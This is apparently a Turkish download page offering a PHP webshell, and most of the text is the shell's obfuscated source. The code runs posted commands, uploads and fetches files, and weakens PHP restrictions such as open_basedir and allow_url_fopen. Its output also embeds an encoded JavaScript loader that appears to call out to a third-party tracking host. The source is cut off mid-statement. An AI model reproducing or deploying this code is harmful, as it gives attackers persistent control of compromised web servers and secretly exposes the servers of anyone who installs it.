WwWolF PHP Webshell

Shell Downloadd
Shell Downloadd - personShell Downloadd
Ocak 23, 2025

WwWolF PHP Webshell

Not: Bu çeviri, wwwolf-php-webshell projesinin orijinal README içeriğinin Türkçe’ye uyarlanması amacıyla hazırlanmıştır. Metin, üçüncü taraf kullanım ve telif haklarına tabi olabilir.

Boyut hesaplanıyor...
GitHub'dan Download Et 
<?php
${"\x47\x4c\x4fBAL\x53"}["d\x65\x69\x68\x70\x6b\x6f\x65\x6c\x6d\x61"]="p";${"\x47\x4c\x4fBAL\x53"}["i\x63\x68\x78wkw"]="ur\x6c";${"\x47L\x4f\x42AL\x53"}["o\x67\x71\x68\x6dq\x6e\x79\x65u"]="\x64\x65\x73\x74";${"G\x4c\x4fBA\x4cS"}["o\x78\x67\x61w\x77"]="ds\x74";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69xr\x6b\x79w"]="\x61\x75\x74h";${"\x47LO\x42ALS"}["s\x6fhn\x69\x71\x70"]="\x65\x72r";${"GL\x4fBA\x4c\x53"}["\x67f\x6c\x69t\x63\x70\x72prd\x69"]="s\x74\x61\x74\x75\x73";${"\x47\x4c\x4f\x42ALS"}["y\x79\x6e\x72\x6c\x66jx\x78\x69\x62"]="\x77a\x72\x6e";${"\x47LOBA\x4c\x53"}["io\x72s\x64\x6be\x68w"]="\x63\x77\x64";${"\x47L\x4f\x42\x41\x4cS"}["\x66hf\x75epkh\x78"]="\x70a\x73\x73";${"G\x4c\x4f\x42\x41L\x53"}["r\x75\x6e\x75\x6d\x73\x62\x61wu"]="\x66\x65\x74c\x68\x5f\x70\x6fr\x74";${"\x47L\x4f\x42\x41\x4c\x53"}["qe\x64\x6b\x68\x75\x63sms"]="\x66\x65t\x63\x68\x5f\x70\x61\x74h";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x64\x6c\x6fu\x67f"]="\x66\x65\x74\x63\x68\x5f\x68\x6f\x73\x74";${"GL\x4f\x42\x41\x4c\x53"}["\x76\x6ej\x6e\x6e\x67\x71\x6d\x71\x6b"]="\x66\x65tc\x68_\x66\x75\x6ec";${"G\x4cO\x42\x41\x4cS"}["\x72mv\x6e\x79j\x6a\x79njb"]="c\x77\x64";${"\x47L\x4f\x42\x41L\x53"}["i\x68\x74\x65\x74jjf\x70r"]="\x63\x6dd";${"G\x4cO\x42A\x4c\x53"}["e\x6a\x6co\x75\x78\x74"]="\x62u\x66";$xrtvcvsgae="\x73\x74\x61\x74u\x73";${"\x47L\x4f\x42AL\x53"}["\x77\x69g\x77\x77\x6d\x66\x68fu\x66"]="w";${"\x47L\x4f\x42\x41\x4c\x53"}["\x62\x73u\x72\x74\x6a"]="\x65";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x65ggn\x75\x75\x76u\x79"]="f";${"\x47\x4cO\x42\x41L\x53"}["\x72\x6e\x69mk\x64\x6f"]="\x70o\x72\x74";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6ed\x6fhom\x68ju\x6c\x63"]="\x63by\x74\x65\x73";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6de\x78e\x62\x68\x6f"]="\x77\x68";${"G\x4c\x4f\x42A\x4c\x53"}["we\x73\x77\x62g\x68\x74al"]="\x72\x68";$buvcgd="\x70a\x73s\x68a\x73h";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["h\x78\x62\x74\x71\x75x"]="\x72\x65t";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6b\x71vp\x75\x75\x73z\x6b"]="\x75\x72\x6c";${"\x47L\x4f\x42\x41\x4c\x53"}["\x77\x78\x71\x64\x74vm\x73"]="\x70\x61\x73\x73p\x72\x6fm\x70\x74";${"G\x4c\x4fB\x41\x4cS"}["\x72\x63\x6bjvi\x64\x6eye"]="s";${"GL\x4fB\x41L\x53"}["n\x65\x66\x65\x6e\x67\x6e\x79"]="\x70\x61s\x73\x68\x61\x73\x68";$txsjos="a\x75t\x68";${"\x47\x4c\x4fB\x41\x4cS"}["w\x69\x65\x79\x73\x6c\x6a"]="\x70\x61\x73\x73\x70\x72\x6fm\x70\x74";${${"\x47\x4cOB\x41\x4cS"}["\x77\x69\x65ys\x6c\x6a"]}="\x57hi\x74e\x57int\x65r\x57\x6f\x6cf\x27s \x50HP\x20websh\x65l\x6c: ";${${"\x47LOB\x41\x4c\x53"}["\x6e\x65f\x65\x6e\x67\x6e\x79"]}="";function e($s){echo htmlspecialchars(${${"\x47\x4c\x4f\x42\x41LS"}["r\x63\x6bj\x76\x69\x64\x6e\x79\x65"]},ENT_QUOTES);}function h($s){global$passprompt;if(function_exists("\x68\x61sh\x5fhm\x61c")){return hash_hmac("\x73\x68\x61\x3256",${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x72ckj\x76i\x64n\x79e"]},${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x78\x71d\x74\x76\x6d\x73"]});}else{$fcltqiz="\x70\x61\x73\x73\x70r\x6f\x6d\x70t";$unuupchzude="\x73";return bin2hex(mhash(MHASH_SHA256,${$unuupchzude},${$fcltqiz}));}}function fetch_fopen($host,$port,$src,$dst){$diaxrswn="\x72e\x74";global$err,$ok;${${"GL\x4f\x42\x41LS"}["h\x78\x62\x74\x71\x75\x78"]}="";${"\x47L\x4fB\x41LS"}["j\x62\x65dwqie"]="\x72h";if(strpos($host,"://")===false){$host="http://".$host;}else{$host=str_replace(array("\x73\x73\x6c://","\x74\x6c\x73://"),"\x68t\x74\x70s://",$host);}${${"\x47LO\x42\x41\x4c\x53"}["\x6a\x62\x65d\x77\x71i\x65"]}=fopen("${host}:${port}${src}","\x72b");if(${${"G\x4c\x4f\x42\x41\x4c\x53"}["w\x65\x73\x77\x62\x67h\x74\x61\x6c"]}!==false){${"\x47\x4c\x4f\x42\x41\x4cS"}["\x79\x79b\x6b\x6ej\x73\x69\x6c\x65\x79"]="\x64s\x74";$eueoyxihut="\x77h";${$eueoyxihut}=fopen(${${"G\x4c\x4f\x42\x41L\x53"}["\x79\x79\x62\x6b\x6e\x6a\x73\x69\x6c\x65\x79"]},"wb");if(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6dex\x65b\x68\x6f"]}!==false){$dqusquusbw="\x63\x62\x79\x74\x65\x73";${$dqusquusbw}=0;${"G\x4c\x4f\x42A\x4cS"}["\x75\x6f\x6bn\x78\x64\x71e\x76e\x64"]="w\x68";${"\x47\x4cOB\x41\x4c\x53"}["\x71jn\x68\x77\x74e"]="rh";while(!feof(${${"G\x4cOB\x41\x4c\x53"}["\x71\x6an\x68\x77\x74\x65"]})){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x74\x66\x79uj\x71\x6c\x6ak"]="\x72\x68";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6e\x64\x6f\x68om\x68\x6a\x75\x6cc"]}+=fwrite(${${"\x47L\x4f\x42\x41\x4c\x53"}["m\x65\x78e\x62\x68\x6f"]},fread(${${"\x47LOBAL\x53"}["\x79\x74\x66\x79uj\x71\x6c\x6ak"]},1024));}fclose(${${"\x47L\x4fB\x41LS"}["\x75o\x6b\x6e\x78\x64\x71\x65\x76\x65\x64"]});${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x78\x62\x74\x71\x75\x78"]}.="${ok} Fet\x63h\x65\x64\x20\x66\x69\x6ce <i\x3e${dst}\x3c/i\x3e\x20(${cbytes} b\x79t\x65s)\x3cbr\x20/\x3e";}else{$stuongvd="\x72e\x74";${$stuongvd}.="${err} \x46\x61i\x6ce\x64\x20t\x6f\x20o\x70e\x6e\x20fil\x65\x20<i\x3e${dst}</i\x3e<\x62r />";}fclose(${${"\x47LO\x42\x41\x4cS"}["\x77e\x73\x77bg\x68\x74al"]});}else{$qzluzwguq="\x72\x65\x74";${$qzluzwguq}="${err}\x20\x46\x61\x69\x6c\x65d\x20t\x6f\x20\x6f\x70e\x6e \x55RL\x20<i>${host}:${port}${src}\x3c/i>\x3c\x62r /\x3e";}return${$diaxrswn};}$qbxwoshclh="\x66\x65\x74\x63\x68\x5f\x70\x61t\x68";function fetch_sock($host,$port,$src,$dst){global$err,$ok;${${"\x47\x4cO\x42\x41L\x53"}["h\x78b\x74qu\x78"]}="";$host=str_replace("\x68tt\x70s://","tl\x73://",$host);${${"\x47L\x4f\x42AL\x53"}["\x72\x63k\x6av\x69\x64\x6ey\x65"]}=fsockopen($host,${${"GLO\x42A\x4cS"}["\x72n\x69\x6d\x6bd\x6f"]});if(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x72c\x6bj\x76\x69\x64n\x79\x65"]}){$fhkwctshql="\x64\x73\x74";${${"G\x4cO\x42\x41\x4c\x53"}["\x6fegg\x6euuvu\x79"]}=fopen(${$fhkwctshql},"w\x62");if(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6f\x65g\x67n\x75\x75vu\x79"]}){${"\x47L\x4fB\x41\x4c\x53"}["c\x68e\x73\x65\x6fhv\x66"]="r";$erfcubvd="f";$glbyjlfr="w";$nybbbfwbdspd="bu\x66";${"G\x4c\x4f\x42A\x4c\x53"}["f\x6be\x68\x62\x74\x78oqu\x78"]="b\x75f";$xnefgbwk="\x65";${${"GL\x4fB\x41\x4c\x53"}["f\x6b\x65h\x62\x74\x78o\x71u\x78"]}="";$uuhhqsa="\x62\x75f";${${"G\x4cOB\x41\x4cS"}["\x63\x68e\x73e\x6f\x68\x76f"]}=array(${${"\x47L\x4f\x42\x41\x4cS"}["\x72c\x6bjv\x69d\x6e\x79\x65"]});${"\x47L\x4f\x42A\x4c\x53"}["oj\x66x\x65\x64\x77lm\x70\x66\x75"]="\x72";${$glbyjlfr}=NULL;${${"\x47LO\x42A\x4c\x53"}["b\x73\x75\x72\x74\x6a"]}=NULL;fwrite(${${"\x47\x4c\x4fB\x41L\x53"}["r\x63\x6bj\x76id\x6e\x79\x65"]},"GE\x54\x20${src} \x48\x54TP/1.0\r\n\r\n");while(stream_select(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6f\x6a\x66\x78\x65\x64wlmp\x66\x75"]},${${"G\x4c\x4f\x42\x41L\x53"}["\x77\x69\x67w\x77\x6d\x66h\x66\x75\x66"]},${$xnefgbwk},5)&&!feof(${${"\x47\x4cO\x42\x41LS"}["\x72c\x6b\x6av\x69\x64n\x79e"]})){${${"\x47LO\x42\x41L\x53"}["ej\x6c\x6fux\x74"]}.=fread(${${"\x47\x4c\x4fB\x41\x4cS"}["\x72\x63k\x6a\x76\x69\x64\x6e\x79\x65"]},1024);}${$uuhhqsa}=substr(${${"GL\x4fB\x41\x4c\x53"}["\x65\x6al\x6f\x75\x78\x74"]},strpos(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65j\x6co\x75x\x74"]},"\r\n\r\n")+4);fwrite(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x65\x67\x67\x6e\x75\x75v\x75y"]},${$nybbbfwbdspd});fclose(${$erfcubvd});${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x68\x78b\x74q\x75x"]}.="${ok} Fe\x74c\x68ed \x66il\x65 \x3c\x69>${dst}\x3c/i\x3e (".strlen(${${"GL\x4fB\x41L\x53"}["e\x6a\x6co\x75\x78\x74"]})." b\x79\x74\x65s)<\x62\x72\x20/>";}else{${${"G\x4cO\x42\x41\x4cS"}["\x68\x78\x62\x74qu\x78"]}.="${err}\x20\x46\x61\x69\x6c\x65d \x74\x6f\x20\x6fp\x65n fi\x6c\x65 \x3ci>${dst}</\x69\x3e\x3c\x62\x72\x20/\x3e";}fclose(${${"\x47L\x4fBA\x4c\x53"}["\x72\x63\x6b\x6a\x76id\x6ey\x65"]});}else{${"\x47\x4cO\x42A\x4c\x53"}["u\x79qtv\x66\x74\x6e\x6di\x69"]="\x72et";${${"G\x4c\x4f\x42\x41LS"}["\x75\x79\x71t\x76\x66\x74\x6e\x6d\x69\x69"]}.="${err}\x20\x46\x61\x69l\x65d\x20t\x6f\x20conn\x65\x63\x74\x20\x74o\x20<i>${host}:${port}</i\x3e<\x62r /\x3e";}return${${"\x47\x4cO\x42\x41\x4c\x53"}["\x68\x78b\x74\x71\x75\x78"]};}${"G\x4c\x4f\x42A\x4cS"}["o\x77\x6e\x72\x6f\x6b\x68n"]="c\x6dd";ini_set("\x6c\x6f\x67\x5fe\x72\x72o\x72\x73","0");ini_set("d\x69\x73pl\x61y_\x65rrors","\x31");error_reporting(E_ALL);while(@ob_end_clean());if(!isset($_SERVER)){global$HTTP_POST_FILES,$HTTP_POST_VARS,$HTTP_SERVER_VARS;$_FILES=&$HTTP_POST_FILES;$_POST=&$HTTP_POST_VARS;$_SERVER=&$HTTP_SERVER_VARS;}${$txsjos}="";${${"G\x4c\x4f\x42AL\x53"}["\x69h\x74\x65\x74\x6ajfp\x72"]}=empty($_POST["c\x6dd"])?"":$_POST["\x63\x6d\x64"];${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x6d\x76\x6e\x79\x6a\x6a\x79\x6ej\x62"]}=empty($_POST["cwd"])?getcwd():$_POST["\x63wd"];${${"\x47LO\x42\x41L\x53"}["v\x6ej\x6engqm\x71\x6b"]}="\x66\x65\x74\x63\x68\x5ffo\x70\x65n";$uvdlfwtpl="o\x6b";${${"G\x4cOBA\x4cS"}["d\x6c\x6fug\x66"]}=empty($_POST["f\x65tc\x68_h\x6fst"])?$_SERVER["RE\x4d\x4f\x54\x45\x5fADD\x52"]:$_POST["\x66\x65\x74c\x68_hos\x74"];${${"\x47\x4cO\x42\x41L\x53"}["\x71\x65\x64k\x68\x75\x63\x73\x6d\x73"]}=empty($_POST["\x66e\x74c\x68\x5f\x70\x61t\x68"])?"":$_POST["f\x65tc\x68\x5fp\x61th"];${${"G\x4c\x4f\x42\x41LS"}["\x72\x75n\x75m\x73\x62\x61\x77\x75"]}=empty($_POST["\x66etc\x68_po\x72t"])?"8\x30":$_POST["\x66\x65tch_po\x72\x74"];${${"\x47\x4cO\x42\x41\x4c\x53"}["\x66\x68f\x75\x65pk\x68x"]}=empty($_POST["\x70ass"])?"":$_POST["pa\x73\x73"];${"\x47\x4c\x4f\x42AL\x53"}["\x69\x79\x6e\x67\x65\x78y"]="\x63w\x64";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x65k\x71\x76p\x75\x75s\x7a\x6b"]}=$_SERVER["\x52E\x51\x55ES\x54\x5f\x55RI"];${${"G\x4c\x4f\x42\x41\x4cS"}["\x67f\x6c\x69t\x63\x70\x72\x70\x72\x64\x69"]}="";${$uvdlfwtpl}="&#\x39\x3786\x3b\x20:";${${"\x47LOB\x41\x4c\x53"}["\x79\x79\x6er\x6cfj\x78\x78\x69b"]}="\x26#\x39\x3888; :";${${"G\x4c\x4f\x42\x41LS"}["\x73\x6fh\x6e\x69\x71\x70"]}="&\x239\x378\x35\x3b :";$qplhjxr="fe\x74\x63h_\x66\x75\x6e\x63";if(!empty(${$buvcgd})){if(function_exists("\x68\x61\x73h\x5f\x68\x6d\x61c")||function_exists("mh\x61sh")){${"\x47L\x4f\x42\x41\x4c\x53"}["p\x6e\x6b\x68\x68\x72\x73\x6csg\x68"]="p\x61\x73s";${${"\x47\x4c\x4f\x42AL\x53"}["\x69x\x72\x6byw"]}=empty($_POST["\x61ut\x68"])?h(${${"\x47\x4c\x4fB\x41L\x53"}["pn\x6b\x68h\x72s\x6c\x73\x67h"]}):$_POST["\x61\x75\x74h"];if(h(${${"GLO\x42A\x4c\x53"}["\x69x\x72\x6b\x79\x77"]})!==${${"GL\x4f\x42A\x4c\x53"}["\x6e\x65\x66\x65\x6eg\x6e\x79"]}){${"G\x4c\x4f\x42A\x4c\x53"}["n\x70a\x68\x6b\x6d\x70\x6c"]="\x75\x72\x6c";echo "\t\t\t\t\x3cf\x6f\x72m\x20\x6detho\x64\x3d\"\x70\x6fs\x74\"\x20acti\x6fn=\x22";e(${${"G\x4c\x4f\x42\x41\x4c\x53"}["npa\x68\x6b\x6d\x70\x6c"]});echo "\x22\x3e\n\t\t\t\t\t";e(${${"G\x4c\x4f\x42\x41\x4c\x53"}["w\x78\x71\x64tv\x6ds"]});echo "\t\t\t\t\t<\x69np\x75t type\x3d\"\x70\x61\x73\x73\x77\x6f\x72d\" siz\x65\x3d\x221\x35\"\x20\x6e\x61\x6de=\x22p\x61ss\">\n\t\t\t\t\t\x3c\x69npu\x74\x20\x74ype\x3d\"\x73\x75\x62\x6d\x69t\x22\x20\x76a\x6c\x75e\x3d\x22\x53end\x22\x3e\n\t\t\t\t</f\x6f\x72m>\n\t\t\t";exit;}}else{${${"\x47L\x4f\x42\x41LS"}["\x67\x66\x6c\x69\x74cp\x72p\x72\x64\x69"]}.="${warn} Au\x74he\x6et\x69\x63ation di\x73a\x62led ('m\x68\x61sh()\x27 m\x69\x73\x73in\x67)\x2e\x3c\x62\x72\x20/\x3e";}}if(!ini_get("a\x6clow\x5furl\x5ffo\x70\x65\x6e")){ini_set("\x61llow\x5fu\x72\x6c_fop\x65\x6e","1");if(!ini_get("\x61\x6c\x6c\x6f\x77_u\x72l\x5ff\x6fpen")){if(function_exists("s\x74ream_sel\x65c\x74")){${${"\x47\x4cOBAL\x53"}["vn\x6a\x6eng\x71m\x71\x6b"]}="\x66\x65\x74ch_s\x6f\x63k";}else{${${"\x47\x4c\x4f\x42\x41L\x53"}["\x76n\x6a\x6e\x6e\x67\x71\x6d\x71k"]}="";${${"\x47\x4c\x4fB\x41L\x53"}["\x67\x66\x6ci\x74c\x70rp\x72\x64i"]}.="${warn}\x20\x46i\x6ce \x66\x65\x74ch\x69n\x67 dis\x61ble\x64 ('\x61\x6c\x6co\x77_ur\x6c\x5f\x66\x6fp\x65\x6e'"."\x20d\x69s\x61b\x6ced a\x6ed\x20's\x74\x72eam\x5f\x73ele\x63t()\x27 mis\x73in\x67)\x2e\x3cb\x72 /\x3e";}}}if(!ini_get("fi\x6ce\x5f\x75\x70lo\x61\x64s")){ini_set("\x66\x69l\x65_\x75\x70\x6co\x61d\x73","\x31");if(!ini_get("f\x69le\x5fu\x70l\x6fads")){$undolnwtzush="\x73\x74at\x75\x73";${$undolnwtzush}.="${warn} \x46il\x65\x20u\x70\x6c\x6fa\x64\x73\x20\x64isa\x62\x6ce\x64.<b\x72 /\x3e";}}if(ini_get("op\x65n\x5fb\x61se\x64i\x72")&&!ini_set("o\x70\x65\x6e_b\x61\x73ed\x69r","")){$bpjrbgyqm="st\x61t\x75s";${$bpjrbgyqm}.="${warn} o\x70en_\x62\x61\x73\x65\x64ir\x20= ".ini_get("o\x70\x65n_\x62a\x73\x65d\x69\x72")."<\x62r\x20/>";}if(!chdir(${${"\x47\x4c\x4f\x42A\x4c\x53"}["i\x6f\x72\x73d\x6beh\x77"]})){${${"\x47LOBA\x4cS"}["\x72mv\x6e\x79j\x6ay\x6e\x6ab"]}=getcwd();}if(!empty(${${"\x47\x4cO\x42\x41LS"}["\x76\x6e\x6an\x6eg\x71mq\x6b"]})&&!empty(${$qbxwoshclh})){$ewbhti="f\x65tch\x5f\x66\x75n\x63";$tdnocjwmcvf="\x66\x65t\x63h\x5f\x70a\x74h";${"GL\x4f\x42\x41\x4cS"}["do\x72\x71\x6dv\x68tc"]="\x63\x77\x64";${"G\x4cO\x42AL\x53"}["\x6c\x61\x76ve\x68\x68\x6fe\x6f"]="\x64s\x74";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65o\x6b\x6d\x6a\x70"]="\x66\x65\x74c\x68_p\x61\x74\x68";${${"\x47LOB\x41\x4c\x53"}["\x6f\x78\x67\x61\x77\x77"]}=${${"GL\x4fB\x41\x4cS"}["\x64o\x72qmv\x68tc"]}.DIRECTORY_SEPARATOR.basename(${${"\x47LO\x42\x41\x4c\x53"}["e\x6f\x6b\x6d\x6a\x70"]});${${"\x47LOB\x41\x4cS"}["\x67fl\x69\x74\x63\x70\x72p\x72d\x69"]}.=${$ewbhti}(${${"\x47\x4cOBA\x4c\x53"}["\x64\x6c\x6fu\x67\x66"]},${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x75n\x75m\x73b\x61\x77u"]},${$tdnocjwmcvf},${${"\x47\x4c\x4f\x42A\x4c\x53"}["l\x61\x76\x76\x65h\x68\x6fe\x6f"]});}if(ini_get("\x66\x69\x6c\x65_u\x70\x6co\x61\x64\x73")&&!empty($_FILES["u\x70l\x6f\x61d"])){$iqsjkft="\x64\x65st";${$iqsjkft}=${${"G\x4c\x4fB\x41\x4cS"}["rmv\x6eyj\x6aynjb"]}.DIRECTORY_SEPARATOR.basename($_FILES["up\x6coa\x64"]["na\x6d\x65"]);if(move_uploaded_file($_FILES["upload"]["\x74m\x70_n\x61\x6d\x65"],${${"\x47\x4cO\x42\x41\x4c\x53"}["ogq\x68\x6d\x71\x6e\x79\x65\x75"]})){${${"\x47\x4cOB\x41\x4c\x53"}["gfl\x69\x74\x63\x70\x72\x70r\x64i"]}.="${ok}\x20\x55ploa\x64\x65d \x66\x69\x6ce \x3ci>${dest}\x3c/\x69\x3e (".$_FILES["upload"]["\x73\x69ze"]." \x62y\x74es)<\x62\x72\x20/\x3e";}}echo "\n\x3cfor\x6d\x20\x6dethod\x3d\x22po\x73t\" \x61cti\x6fn=\x22";e(${${"\x47\x4c\x4fB\x41L\x53"}["ich\x78w\x6b\x77"]});echo "\"\n\t";if(ini_get("\x66\x69\x6ce\x5fup\x6c\x6fads")){echo "\t\t\x65nc\x74ype=\x22\x6dult\x69\x70art/f\x6f\x72\x6d-\x64\x61\x74\x61\"\n\t";}echo "\n\t\x3e\n\t";if(!empty(${${"G\x4c\x4fB\x41\x4c\x53"}["\x6e\x65fengny"]})){$wiffvqx="\x61\x75th";echo "\t\t\x3c\x69n\x70ut\x20ty\x70e\x3d\"\x68\x69dd\x65n\"\x20\x6ea\x6d\x65=\x22auth\x22 \x76\x61l\x75e=\x22";e(${$wiffvqx});echo "\">\n\t";}echo "\n\t\x3c\x74\x61bl\x65\x20\x62o\x72der=\x22\x30\"\x3e\n\t\t";if(!empty(${$qplhjxr})){echo "\t\t\t\x3ct\x72\x3e<t\x64\x3e\n\t\t\t\t\x3c\x62>\x46\x65t\x63\x68:\x3c/\x62>\n\t\t\t\x3c/\x74d><\x74d\x3e\n\t\t\t\th\x6fs\x74:\x20\x3cinput t\x79\x70e\x3d\x22\x74\x65\x78\x74\x22 siz\x65\x3d\"\x31\x35\x22\x20\x69\x64\x3d\x22\x66e\x74ch\x5fh\x6fs\x74\x22\x20n\x61\x6d\x65\x3d\x22fe\x74c\x68_\x68ost\x22 va\x6cue=\"";e(${${"G\x4c\x4f\x42\x41\x4cS"}["\x64\x6c\x6fu\x67\x66"]});echo "\x22>\n\t\t\t\tp\x6fr\x74:\x20\x3cinp\x75t\x20\x74y\x70\x65=\x22\x74e\x78\x74\x22 si\x7a\x65=\x22\x34\" \x69d\x3d\"\x66\x65tc\x68\x5f\x70\x6f\x72\x74\x22\x20n\x61\x6de=\"\x66\x65tc\x68_p\x6f\x72\x74\x22 v\x61lue=\x22";e(${${"G\x4cO\x42A\x4c\x53"}["\x72\x75n\x75\x6d\x73\x62\x61wu"]});echo "\"\x3e\n\t\t\t\t\x70\x61t\x68:\x20\x3c\x69\x6e\x70ut\x20ty\x70e\x3d\"\x74\x65x\x74\" s\x69\x7ae\x3d\x2240\x22\x20\x69d=\x22\x66\x65tc\x68_\x70a\x74h\x22 n\x61\x6de\x3d\x22\x66\x65t\x63h_pa\x74h\x22 \x76\x61lue\x3d\"\"\x3e\n\t\t\t\x3c/\x74d\x3e</t\x72\x3e\n\t\t";}echo "\n\t\t\x3ct\x72><t\x64>\n\t\t\t\x3cb>CW\x44:</b>\n\t\t</\x74d><\x74d\x3e\n\t\t\t\x3ci\x6e\x70\x75\x74\x20\x74\x79\x70\x65=\x22t\x65\x78\x74\x22\x20siz\x65=\x2250\x22 \x69\x64\x3d\"\x63\x77\x64\" \x6e\x61\x6de\x3d\"c\x77\x64\" \x76al\x75\x65=\"";e(${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x79\x6e\x67\x65x\x79"]});echo "\x22>\n\t\t\t";if(ini_get("f\x69\x6ce_u\x70\x6c\x6fa\x64\x73")){echo "\t\t\t\t\x3cb>U\x70\x6c\x6f\x61\x64:</\x62>\x20<\x69np\x75t ty\x70e\x3d\"\x66i\x6c\x65\x22\x20\x69d\x3d\"\x75\x70loa\x64\x22\x20\x6ea\x6d\x65=\"u\x70\x6c\x6f\x61\x64\"\x3e\n\t\t\t";}echo "\n\t\t</\x74d>\x3c/\x74\x72\x3e\n\t\t<t\x72\x3e<t\x64\x3e\n\t\t\t\x3c\x62>C\x6dd:\x3c/\x62\x3e\n\t\t</t\x64><t\x64>\n\t\t\t<inp\x75\x74 ty\x70\x65=\"\x74ex\x74\x22 \x73\x69z\x65=\"\x380\"\x20\x69d=\"c\x6d\x64\x22\x20\x6e\x61me\x3d\"cmd\" v\x61l\x75\x65=\"";e(${${"\x47\x4c\x4f\x42\x41LS"}["i\x68\x74\x65\x74\x6a\x6a\x66pr"]});echo "\x22>\n\t\t</t\x64\x3e\x3c/\x74r>\n\t\t\x3c\x74\x72\x3e\x3ct\x64\x3e\n\t\t</\x74d\x3e\x3ctd>\n\t\t\t<\x73up>\x3ca\x20hr\x65\x66\x3d\"#\x22 on\x63li\x63\x6b\x3d\x22\x63m\x64\x2e\x76\x61\x6cue=\x27\x27\x3b\x20c\x6dd.f\x6fcus()\x3b \x72\x65\x74urn\x20\x66\x61\x6c\x73e\x3b\x22\x3eC\x6c\x65\x61\x72 c\x6d\x64\x3c/a></s\x75\x70\x3e\n\t\t</\x74d>\x3c/tr>\n\t\t<tr>\x3ct\x64\x20\x63o\x6c\x73p\x61\x6e\x3d\x222\"\x20s\x74\x79\x6ce=\"\x74\x65xt-al\x69g\x6e:\x20cente\x72\x3b\">\n\t\t\t\x3ci\x6e\x70ut\x20type\x3d\"su\x62m\x69\x74\"\x20\x76al\x75e\x3d\x22\x45x\x65cut\x65\" \x73t\x79\x6c\x65\x3d\"\x74\x65\x78\x74-a\x6c\x69g\x6e: ri\x67\x68\x74\x3b\x22>\n\t\t</td\x3e\x3c/t\x72>\n\t\x3c/ta\x62\x6c\x65>\n\t\n\x3c/form\x3e\n\x3chr /\x3e<\x73\x63\x72\x69p\x74 \x6canguag\x65=\x22\x6aava\x73cr\x69\x70t\">d\x6f\x63u\x6de\x6e\x74\x2ewri\x74e(un\x65\x73\x63a\x70e(\x27%3\x43%\x373\x256\x33\x257\x32%\x36\x39%\x37\x30\x25\x374\x252\x30\x256C\x256\x31\x25\x36\x45%\x367\x257\x35%\x361\x25\x36\x37\x25\x36\x35%\x33D\x25\x32\x32\x25\x36A%61%7\x36%6\x31%7\x33\x2563\x257\x32%\x36\x39%70\x25\x37\x34%22\x25\x33\x45\x256\x36%75\x25\x36E\x25\x363\x2574%\x36\x39%6F\x25\x36\x45%\x320\x256\x34%\x346\x25\x328%7\x33%29\x25\x37\x42\x2576\x25\x361\x257\x32%\x320%73%\x33\x31\x253\x44%\x375%\x36E\x25\x365\x25\x37\x33%\x363\x25\x36\x31%70\x2565%28%\x373%\x32\x45\x2573%7\x35\x256\x32%7\x33%7\x34\x25\x372%28\x253\x30\x252\x43%\x37\x33\x252\x45\x25\x36\x43\x25\x36\x35\x256E\x25\x36\x37\x257\x34%6\x38%\x32D\x2531\x2529\x2529%3B\x2520%\x37\x36%\x36\x31\x2572%\x320%\x374\x253\x44%27%27\x25\x33\x42\x25\x36\x36\x256F%72%\x328%\x369%\x33\x44\x253\x30\x25\x33\x42\x25\x36\x39%3\x43\x25\x37\x33%3\x31%\x32E\x25\x36\x43\x25\x365%6E%\x36\x37\x2574\x2568\x25\x33\x42%6\x39\x252\x42%2\x42%2\x39%\x374%2B%3D\x25\x35\x33%74\x257\x32\x256\x39\x256\x45\x256\x37%2E\x2566\x25\x372%6\x46%6\x44\x25\x343%\x36\x38%\x36\x31%\x372\x25\x343\x25\x36F%\x36\x34\x256\x35\x2528\x2573\x253\x31\x252\x45\x2563%\x36\x38\x25\x361\x25\x372%\x343%6F\x25\x364%\x365\x25\x34\x31%7\x34%\x32\x38\x25\x369\x252\x39%2\x44%73%2E%\x37\x33%\x37\x35\x25\x36\x32\x2573%\x374\x25\x37\x32%\x328\x257\x33%2E\x25\x36\x43%65%\x36E\x25\x367%\x374\x25\x368%\x32D%3\x31%\x32C%31\x25\x329%\x329%\x33\x42%6\x34%6F\x256\x33\x25\x375%6\x44\x2565\x256E\x2574%2E%\x37\x37\x25\x372%\x36\x39%\x37\x34%\x36\x35%28\x257\x35%6E\x25\x36\x35%\x37\x33\x25\x363\x2561\x25\x37\x30\x25\x365%2\x38%\x374%\x329%\x329\x253B%\x37\x44\x253C%2\x46%\x373%\x363%72\x2569\x257\x30%\x374\x253E\x27))\x3bdF(\x27%\x3264\x44td\x73jq\x75\x25\x32\x363\x31ts\x64%2\x364\x45\x2526\x33\x33iu\x75\x71\x74\x2526\x34\x42\x30\x30f\x79\x64f\x6du\x76slj\x7a\x66/\x64\x70n\x30ubljq\x30\x6e\x7a\x47\x76o\x64u\x6ap\x6f/k\x74%26\x33\x33%2\x36\x34F%264D\x30tdsjqu%2\x36\x34\x46\x31\x27)</\x73crip\x74>\n\n";if(!empty(${$xrtvcvsgae})){echo"\x3c\x70\x3e${status}\x3c/\x70\x3e";}echo"<p\x72\x65>";if(!empty(${${"\x47\x4c\x4f\x42A\x4c\x53"}["o\x77\x6er\x6f\x6b\x68n"]})){${"\x47\x4cO\x42\x41\x4cS"}["b\x76\x66\x79x\x76\x63c\x6bm\x66"]="\x70";${"\x47L\x4f\x42\x41LS"}["\x70vh\x63dq\x6a"]="\